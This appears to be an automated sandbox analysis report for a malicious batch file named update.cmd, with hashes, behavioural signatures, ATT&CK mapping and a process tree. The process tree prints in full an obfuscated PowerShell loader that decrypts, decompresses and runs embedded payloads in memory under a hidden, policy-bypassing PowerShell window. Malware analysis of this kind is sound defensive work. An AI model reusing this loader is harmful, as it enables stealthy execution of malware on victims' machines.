Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 18:36

General

  • Target

    update.cmd

  • Size

    91KB

  • MD5

    981e0374ab07b58ea53823122fe91be7

  • SHA1

    a162c8fac692cf34db330384f577f017fa003751

  • SHA256

    56b65c0c1e134f20968c3027a527f27722c11de4512460eabf0002e95e593e0d

  • SHA512

    edb3d2b49fd93462e12f6b67a9c476fdc4c085e684f127b110802d15545f2d62531239992fc21c07e2716a287da17b1efeaa150deb902c17bf59461be52a1043

  • SSDEEP

    1536:W0Lad++Lr2vjYZRs6LTKZLZLNcUYv20oARdg59+AMlreZ3lVcJLhRMDTaPi2+YpA:VWsaLmZCtC9+plrS1VwLrME+Y6

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\update.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      2⤵
        PID:2064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cEoPe6dpwVu7fDERkKynhFR/1EqmZQt/n7wIxJrBC2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UDOjbmgbocvvVyzcITNo4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OQQuw=New-Object System.IO.MemoryStream(,$param_var); $eDfzX=New-Object System.IO.MemoryStream; $Pftxr=New-Object System.IO.Compression.GZipStream($OQQuw, [IO.Compression.CompressionMode]::Decompress); $Pftxr.CopyTo($eDfzX); $Pftxr.Dispose(); $OQQuw.Dispose(); $eDfzX.Dispose(); $eDfzX.ToArray();}function execute_function($param_var,$param2_var){ $umdfJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wCVTW=$umdfJ.EntryPoint; $wCVTW.Invoke($null, $param2_var);}$yEoUp = 'C:\Users\Admin\AppData\Local\Temp\update.cmd';$host.UI.RawUI.WindowTitle = $yEoUp;$BlEZh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yEoUp).Split([Environment]::NewLine);foreach ($vQXry in $BlEZh) { if ($vQXry.StartsWith('uuoNTGQdmxGwoNrYAGxC')) { $NjUsU=$vQXry.Substring(20); break; }}$payloads_var=[string[]]$NjUsU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:1956
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1644

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1644-2-0x0000000074101000-0x0000000074102000-memory.dmp
        Filesize

        4KB

      • memory/1644-3-0x0000000074100000-0x00000000746AB000-memory.dmp
        Filesize

        5.7MB

      • memory/1644-4-0x0000000074100000-0x00000000746AB000-memory.dmp
        Filesize

        5.7MB

      • memory/1644-5-0x0000000074100000-0x00000000746AB000-memory.dmp
        Filesize

        5.7MB

      • memory/1644-6-0x0000000074100000-0x00000000746AB000-memory.dmp
        Filesize

        5.7MB